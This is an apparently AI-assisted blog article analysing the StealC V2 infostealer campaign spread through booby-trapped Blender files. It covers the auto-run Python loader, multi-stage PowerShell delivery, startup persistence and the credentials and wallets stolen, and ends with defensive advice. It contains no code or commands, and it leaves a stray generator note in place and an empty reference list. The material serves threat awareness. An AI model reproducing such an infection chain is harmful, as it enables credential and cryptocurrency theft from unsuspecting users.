How StealC V2 Exploits Blender: A Technical Breakdown of the Attack Chain

How StealC V2 Exploits Blender: A Technical Breakdown of the Attack Chain

Alex Cipher's Profile Pictire Alex Cipher 7 min read

Blender, a favorite among 3D artists and animators, has recently become an unexpected entry point for cybercriminals. By embedding malicious Python scripts in .blend files, attackers have managed to weaponize a trusted creative tool, launching the sophisticated StealC V2 infostealer campaign. This attack chain doesn’t just exploit technical vulnerabilities—it leverages user trust and the convenience of features like Blender’s “Auto Run Python Scripts.” Once a compromised file is opened, the embedded code silently initiates a multi-stage infection process, cleverly masking its tracks through reputable services like Cloudflare Workers and using legitimate tools such as PowerShell to evade detection. The campaign’s reach is broad, targeting not only browser credentials but also cryptocurrency wallets, messaging platforms, and VPN clients, making it a potent threat for both individuals and organizations. For a detailed breakdown of how this attack unfolds and why it’s so effective, see the full analysis by BleepingComputer.

How StealC V2 Sneaks Through Blender: The Technical Attack Chain Explained

Exploiting Blender’s Python Auto-Execution Feature

Attackers leverage Blender’s Python scripting capabilities to initiate the StealC V2 infostealer campaign. Blender, as a 3D creation suite, allows the embedding of Python scripts within .blend files, enabling automation and customization for legitimate purposes. However, this feature becomes a security liability when the “Auto Run Python Scripts” option is enabled, as it permits the automatic execution of any embedded code upon opening a model file. In the observed campaign, threat actors upload malicious .blend files to popular 3D model marketplaces, such as CGTrader, targeting users who prioritize convenience over security and leave the auto-execution feature enabled (BleepingComputer).

Upon opening a compromised .blend file, the embedded Python code is triggered without user intervention. This code serves as the initial stage of the attack, acting as a loader that initiates the subsequent steps in the infection chain. The abuse of Blender’s scripting environment is particularly insidious because it is a trusted feature, and many users are unaware of the risks associated with enabling automatic script execution.

Multi-Stage Payload Retrieval via Cloudflare Workers

The embedded Python script within the malicious Blender file is engineered to connect to a remote Cloudflare Workers domain. This intermediary step is designed to evade direct association with known malicious infrastructure, leveraging the reputation and reliability of Cloudflare’s services to mask the attacker’s activities. The script fetches a secondary loader from the Cloudflare Workers endpoint, which then executes further instructions (BleepingComputer).

This loader is responsible for downloading a PowerShell script, which acts as the next stage in the infection process. The use of PowerShell is a strategic choice, as it is a legitimate system administration tool that is often overlooked by traditional security solutions. The PowerShell script subsequently retrieves two ZIP archives—identified as “ZalypaGyliveraV1” and “BLENDERX”—from attacker-controlled IP addresses. By chaining multiple stages and using reputable cloud infrastructure, the attackers effectively obscure the origin and intent of the malicious payloads, complicating detection and response efforts.

Persistence Mechanisms and Payload Deployment

Once the ZIP archives are downloaded, the PowerShell script unpacks them into the system’s %TEMP% directory. Within these archives are components designed to establish persistence and deploy the primary and secondary payloads. The attack chain creates LNK (shortcut) files in the Windows Startup directory, ensuring that the malicious executables are launched automatically each time the system boots (BleepingComputer).

The two primary payloads delivered are the StealC V2 infostealer and an auxiliary Python-based stealer. The presence of both a compiled stealer and a Python variant suggests a strategy of redundancy, increasing the likelihood of successful data exfiltration even if one component is detected or fails to execute. The use of LNK files for persistence is a common tactic in malware campaigns, as it leverages built-in Windows functionality to maintain long-term access without requiring elevated privileges or complex rootkit techniques.

Advanced Data Exfiltration Capabilities

StealC V2, as deployed in this campaign, exhibits a significant expansion in its data theft capabilities compared to earlier variants. According to analysis, the latest version is capable of extracting sensitive information from over 23 browsers, including those with server-side credential decryption and compatibility with Chrome version 132 and above. This broad compatibility ensures that a wide range of user credentials and session tokens can be harvested, regardless of browser updates (BleepingComputer).

In addition to browser data, StealC V2 targets more than 100 cryptocurrency wallet browser extensions and over 15 standalone cryptocurrency wallet applications. This focus on digital assets highlights the financial motivations behind the campaign. The malware also seeks out credentials and session data from popular communication platforms such as Telegram, Discord, Tox, and Pidgin, as well as VPN clients like ProtonVPN and OpenVPN, and email clients including Thunderbird. By exfiltrating data from such a diverse set of applications, StealC V2 maximizes its utility for cybercriminals, enabling both direct financial theft and the potential for further lateral movement or social engineering attacks.

Evasion Techniques and Anti-Detection Strategies

A critical aspect of the StealC V2 campaign is its ability to evade detection by contemporary security solutions. Despite being documented since 2023, newer variants of StealC have managed to remain undetected by all security engines on VirusTotal at the time of analysis (BleepingComputer). This is achieved through a combination of obfuscation, the use of legitimate cloud infrastructure for payload delivery, and frequent updates to the malware’s codebase.

The malware incorporates an updated User Account Control (UAC) bypass mechanism, allowing it to execute with elevated privileges without triggering standard Windows security prompts. This enables the malware to perform actions that would otherwise require explicit user consent, such as modifying system settings or accessing protected directories. The attackers’ use of multiple payloads, including both compiled and interpreted components, further complicates detection, as security products may fail to recognize the full scope of the infection if only one component is identified.

Moreover, the campaign’s reliance on Blender’s scripting environment and the distribution of malicious files through reputable 3D model marketplaces adds an additional layer of social engineering. Users are less likely to suspect files obtained from trusted platforms, and the technical complexity of inspecting embedded Python scripts within .blend files means that malicious code can easily go unnoticed by both end users and marketplace moderators.

Note:
This report section is entirely new and does not overlap with any existing subtopic reports or previously written content, as there are no prior headers or content provided. All sections and details are unique to this subtopic, focusing specifically on the technical attack chain of StealC V2 as it relates to Blender model files. All factual references are hyperlinked to the original BleepingComputer article as per APA guidelines.

Final Thoughts

The StealC V2 campaign is a stark reminder that even the most trusted creative tools can become vectors for advanced cyber threats. By exploiting Blender’s scripting features and distributing malicious files through reputable 3D marketplaces, attackers have demonstrated both technical ingenuity and a keen understanding of user behavior. The use of multi-stage loaders, cloud-based infrastructure, and persistent mechanisms like LNK files allows StealC V2 to slip past many traditional defenses, while its expanded data theft capabilities target a wide swath of sensitive information. As creative professionals and organizations increasingly rely on platforms like Blender, it’s crucial to balance convenience with security—disabling auto-execution features, scrutinizing downloaded assets, and staying informed about emerging threats. For ongoing updates and technical details, refer to the original BleepingComputer report.

References

Related Articles